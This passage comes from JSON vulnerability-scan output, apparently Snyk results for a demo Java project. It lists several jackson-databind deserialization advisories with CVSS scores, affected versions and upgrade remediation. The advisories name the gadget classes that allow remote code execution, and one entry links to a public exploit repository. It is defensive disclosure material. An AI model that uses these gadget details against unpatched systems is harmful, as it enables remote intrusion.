`jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [Exploit](https://github.com/LeadroyaL/cve-2019-14540-exploit)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2410)\n", - "epssDetails": { - "percentile": "0.74104", - "probability": "0.00410", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-14540" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-h822-r4r5-v8jg" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-09-16T13:03:10.401907Z", - "functions_new": [ - { - "version": [ - "[,2.10.0.pr2)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-09-15T23:27:25Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Functional", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-09-16T23:27:25Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.008832Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467016", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Tatu Saloranta" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.10)", - "[2.7.0,2.8.11.5)", - "[,2.6.7.3)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.9.10", - "2.8.11.5", - "2.6.7.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.10.0.pr1,2.10.0.pr2)", - "[,2.9.10)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2420", - "title": "GitHub Issue" - } - ], - "cvssDetails": [], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:32.899468Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.cxf.jaxrs.provider.XSLTJaxbProvider`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2420)\n", - "epssDetails": null, - "identifiers": { - "CVE": [], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-09-16T14:43:42.115110Z", - "functions_new": [ - { - "version": [ - "[2.10.0.pr1,2.10.0.pr2)", - "[,2.9.10)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-09-16T14:37:38Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-09-16T14:37:37Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-06T13:58:32.899468Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469674", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "bsmali4" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.10.1)", - "[2.7.0,2.8.11.5)", - "[,2.6.7.3)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10.1", - "2.8.11.5", - "2.6.7.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2478", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:52:13.688214Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:53.988000Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:50.462784Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:13.688214Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:53.988000Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered within `org.apache.commons.dbcp.datasources.SharedPoolDataSource` was not blocked. An attacker could leverage this gadget type to perform Remote Code Execution attacks through deserialization.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2478)\n", - "epssDetails": { - "percentile": "0.73908", - "probability": "0.00404", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-16942" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-mx7p-6679-8g3q" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-10-02T08:02:18.178548Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-10-01T17:43:33Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-10-02T17:43:33Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:53.988000Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469676", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "bsmali4" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.10.1)", - "[2.7.0,2.8.11.5)", - "[,2.6.7.3)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10.1", - "2.8.11.5", - "2.6.7.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2478", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:52:13.709990Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:54.024581Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:59.814203Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:13.709990Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:54.024581Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered as `com.p6spy.engine.spy.P6DataSource` was not blocked. An attacker could leverage this gadget type to perform Remote Code Execution attacks through deserialization.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2478)\n", - "epssDetails": { - "percentile": "0.73908", - "probability": "0.00404", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-16943" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-fmmc-742q-jg75" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-10-02T08:03:39.391997Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-10-01T17:43:33Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-10-02T17:43:33Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.024581Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-471943", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/191a4cdf87b56d2ddddb77edd895ee756b7f75eb", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.3...jackson-databind-2.9.10", - "title": "GitHub Comparison" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2460", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:59.172828Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:54.064844Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:04.701685Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:59.172828Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:54.064844Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered related to `net.sf.ehcache.hibernate.EhcacheJtaTransactionManagerLookup`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/191a4cdf87b56d2ddddb77edd895ee756b7f75eb)\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.3...jackson-databind-2.9.10)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2460)\n", - "epssDetails": { - "percentile": "0.85119", - "probability": "0.01174", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-17267" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-f3j5-rmmp-3fc5" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-10-07T10:05:31.629572Z", - "functions_new": [ - { - "version": [ - "[,2.9.10)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-10-07T01:14:26Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-10-07T01:14:26Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.064844Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-472980", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Zhangxianhui" - ], - "semver": { - "vulnerable": [ - "[2.0.0, 2.9.10.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0, 2.9.10.1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Blog Post" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/b5a304a98590b6bb766134f9261e6566dcbbb6d0", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2498", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": 